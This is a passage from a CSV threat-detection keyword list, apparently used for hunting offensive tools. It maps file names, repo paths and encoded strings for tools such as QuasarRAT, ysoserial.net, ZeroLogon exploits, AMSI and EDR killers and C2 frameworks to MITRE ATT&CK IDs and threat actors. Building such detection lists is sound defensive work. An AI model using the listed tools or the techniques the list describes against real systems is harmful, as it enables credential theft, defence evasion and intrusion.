Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*ylAo2kAlUS2kYkala!*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Yml0c3kubWl0LmVkdQ==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*YmxvY2s9MTAw*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*yogeshojha/rengine*,offensive_tool_keyword,rengine,reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. 
reNgine makes it easy for penetration testers to gather reconnaissance with,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/yogeshojha/rengine,1,1,N/A,N/A,10,5904,923,2023-10-02T14:05:29Z,2020-05-03T12:13:12Z -*YOLOP0wn/POSTDump*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*You are trying to target a User Group Policy Object while running the embedded SMB server*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*You_spin_me__round.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*youcantpatchthis*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,0,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*youhacker55/PayGen*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*Your Moms Smart Vibrator*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,user-agent,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*ysoserial -*,offensive_tool_keyword,ysoserial.net,Deserialization payload 
generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial-*.zip,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.exe *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*ysoserial.net*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*ysoserial.sln*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*yunuscadirci/CallStranger*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,1,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -*Yuuup!! Pass Cracked*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*YwBhAGwAYwA=*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Z4nzu/hackingtool*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*zabbix_session_exp.py -*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance 
takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py,1,0,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*zabbix_session_exp.py https*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1505 - T1550 - T1574 - T1210 - T1110,TA0001 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Fa1c0n35/zabbix-cve-2022-23131,1,0,N/A,N/A,1,0,0,2022-02-27T11:31:02Z,2022-02-27T11:30:53Z -*zabbix_session_exp.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/cve-2022-23131,1,1,N/A,N/A,2,146,48,2022-02-24T15:02:12Z,2022-02-18T11:51:47Z -*zarp.py*,offensive_tool_keyword,zarp,A network attack framework.,T1484 - T1498 - T1569,TA0001 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/hatRiot/zarp,1,0,N/A,N/A,10,1376,340,2023-05-01T20:18:05Z,2012-09-16T18:02:34Z -*zblurx/certsync*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*zblurx/dploot*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*zcgonvh/DCOMPotato*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - 
T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*zed2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*zenmap.exe*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*zenoss_3x_command_execution*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*zer0condition/mhydeath*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*zeroday-powershell*,offensive_tool_keyword,zeroday-powershell,This will exploit the Windows operating system allowing you to modify the file Some.dll.,T1203 - T1574.001 - T1546.011,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/OneLogicalMyth/zeroday-powershell,1,1,N/A,N/A,4,323,96,2018-09-12T09:03:04Z,2018-09-10T16:34:14Z -*zerologon clone *https*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - 
T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*zerologon.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1071,TA0008 - TA0006,N/A,N/A,Exploitation tools,https://github.com/michaelpoznecki/zerologon,1,1,N/A,N/A,1,9,4,2020-09-15T16:31:59Z,2020-09-15T05:32:24Z -*zerologon.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ZeroLogon-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*zerologon-restore * -target-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ZeroLogonScanner.*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*ZeroMemoryEx/Amsi-Killer*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*ZeroMemoryEx/Blackout*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*zerosum0x0*,offensive_tool_keyword,zerosum0x0,github repo username hosting backdoors pocs and exploitation tools,N/A,N/A,N/A,N/A,POST Exploitation 
tools,https://github.com/zerosum0x0,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zerosum0x0*koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ZGF0YS5mZGEuZ292*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ZGIuc3NhLmdvdg==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*zha0gongz1*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*zha0gongz1/DesertFox*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*Ziconius/FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*ziiiiizzzb*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 